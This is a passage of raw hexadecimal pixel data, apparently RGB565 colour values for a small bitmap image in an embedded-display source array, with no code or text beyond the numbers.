0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0xc618, 0x0000, 0x0000, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0xff80, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x0000, 0xffff, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0x0000, 